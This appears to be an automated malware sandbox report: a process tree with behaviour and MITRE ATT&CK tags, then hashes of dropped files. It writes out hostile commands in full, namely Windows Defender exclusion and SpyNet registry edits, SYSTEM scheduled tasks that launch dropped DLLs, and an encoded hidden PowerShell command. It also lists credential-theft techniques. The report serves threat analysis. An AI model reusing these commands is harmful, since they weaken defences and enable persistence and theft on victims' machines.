C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:323⤵PID:1460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:323⤵PID:4484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:323⤵PID:4912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:323⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:323⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEpQjAwXw" /SC once /ST 11:15:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEpQjAwXw"2⤵
- System Location Discovery: System Language Discovery
PID:4736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEpQjAwXw"2⤵
- System Location Discovery: System Language Discovery
PID:836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 05:46:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\gKfVXar.exe\" 18 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MFUxwpyluZmBswWip"2⤵PID:4368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2528
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1952
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3900
-
C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\gKfVXar.exeC:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\gKfVXar.exe 18 /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"2⤵
- System Location Discovery: System Language Discovery
PID:1968
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1640
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4152
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\wwmBpS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\EiJiwro.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SEVCueFJyRflUhU"2⤵PID:1472
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SEVCueFJyRflUhU"2⤵
- System Location Discovery: System Language Discovery
PID:116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\cMEXQfR.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\jJxnkyn.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\lYMkSqB.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2280
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\nAJnCyw.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 20:08:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NGWtXtGwgKKYsphzV"2⤵
- System Location Discovery: System Language Discovery
PID:2860
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
- System Location Discovery: System Language Discovery
PID:3552 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
- System Location Discovery: System Language Discovery
PID:3176 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:368
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MFUxwpyluZmBswWip"2⤵
- System Location Discovery: System Language Discovery
PID:2308
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll",#1 /site_id 5254031⤵PID:3300
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2400 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NGWtXtGwgKKYsphzV"3⤵
- System Location Discovery: System Language Discovery
PID:512
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f44c9d40b45b8434a525f14090b39d6e
SHA1d815f2f9aaa17e778a6c474c79f9792472c483c5
SHA25607e7a9ba830cd078e75ae5c3a4022e76730284d0003bde70f4ec1afdc59010ef
SHA5120d37a08ad5637967ba2e386e3188c01ca0b04b17112854dd9755186b57ae9911b3db4ac0c6f2d7d3903aaa438990f56812841c667e712cc81e96db50fde590fa
-
Filesize
2KB
MD5a80a6db18488850fa5d5279b80c8b304
SHA196885fe321daaacce2ff4a1759745356d671e4fe
SHA25635777eeda552103a81cc85898b5c0a6199737ead8c61836c31e7c83940c25a81
SHA512f7e0580d34c2ff0e8f784b5b724333beb56aa1836573057742f3b0b78f888640f345ea8283ab456878b53e50a7e71f72a5ff904eadd8e670813fbbe7e4ed3fff
-
Filesize
2KB
MD513a3307c18228d8101d149d84216f1e9
SHA17bd97ce8418921f6449b7a6c6a06682793a78435
SHA256d2528b4f72251b8e0900d1f58faff2ae5865285255c3b421c6ea27bb851c2c4e
SHA5121b7b8de2977ea695d5d02e22c1697711fb7e6ae06b69dbfd292c450bd4e1d78b47222eea78be2a07a3bef95dd176bf2f80388ca3c17750503bf4fe00972fbe8f
-
Filesize
2KB
MD539313f4bbf6889109c7eaf2b6e93ed6b
SHA171154e485db4f6f7c58ede10e13c21a951e18896
SHA2562422ac71e33d491639b539e63a5f0919f6c1b3df4a01b74286488fab9f73a087
SHA512f6e5efb79a716fad0544d590cd37d1b480263729e1521a944ada15fdc13bad8b1b567f532d3c3d409f368fcea77c91704a3fe46b86f7c7114a682ed2dace0fda
-
Filesize
1.1MB
MD50f9f7aa1f5117b46ddb69e21fe6f2825
SHA19d1c2467468b71ace23704af5529b6c70fc29f36
SHA256628646645a289a5454d2bc96315ab3bc2ebb1b3574042f74decb0e0ca42ea057
SHA5126ce6d6530070b1a7783551698b734e0c3429db290109a23253d51603ac9638d9dd2f45af7ecac83fd976f1af2e11d24b29cb83663c00de733df1c83955025eac
-
Filesize
2KB
MD5bc204f30a069b452cf3fc48f81f1ccf3
SHA10de9ceb247955a586266274ed2bbf867ad30fa98
SHA25667925ecf7a7423bb099347620cd663e0bc53ac51dd4f372f606a8c95a3a2e7ff
SHA51204cec319c3caec0e5307cbd7c30f9e00a87e93a82403a25e8b78ceb8455e8915b0ec229243a329e185402b2f522e89c187ac4a53c95af9d5b663208e86e42c14
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
12KB
MD5fb6e0e8fee85431cb73000a47013190b
SHA17842d60697c838163424fd4b906a161dc034fddc
SHA256ccc19ee255fcdeb04edfc45ae106fbf3fd1f98c5d1660968be2a7ca4262372d3
SHA51283ee54c5164b05316c7a3ebed956b74b8b02ad97468ff42dbdd015d04986ebb4a913ab38d3636de00135482218f77ffb5105f45eda61901e3be5b0bcaa18dd9e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD51e2c46d707095416e0688722396d9f42
SHA1fc68f74ffb90254cda36c2a1ff559857bb4b8ad1
SHA2561ce00911717ca1d7ac60b5ee7d8b32c5cfa98b4e6fd468e3ad9233d0057de3b7
SHA512144425003ac98b6ce1189077c558589766b347ddb71cd3d994b7b28d7915ad08f72be48bb9b1b5e18e6a7cb41d8a45e7e26290a7e0a54aca0294bd7d358bfe9e
-
Filesize
6.2MB
MD58cfc8a5c654e986ab3de168ecbc93096
SHA1a745e47565aed873f5f5264543479266d8918a64
SHA2562996bcb9d033414f6dce67539a71bf29250dc19a66424944065bf5cdf285500a
SHA51299398bbaed5f5547331f21c9e9b2eda5b4842ad88b950f1cce4a04202d45a25a83fdd1593f6b15d05fdee7ba4872ba287b4a5e5c1a0c8c337311eb8b3326dac3
-
Filesize
5KB
MD58a23e7417f0e171228321494ead8e634
SHA1929d7a156f7bdff24875772e56f69d2b0715a59f
SHA256fc2c39e0dc4a7e8e5f576cfef0253ef6adca13617ea7983b0f0a0ca2ddab8ef3
SHA512248680d761e09aeac8580416201ccc06e21258f98a9db3187a29ff525896cc79cd91827f2b52a34718f204dabe95d2311314439f74c0cb3019f4b89ce92b0037
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732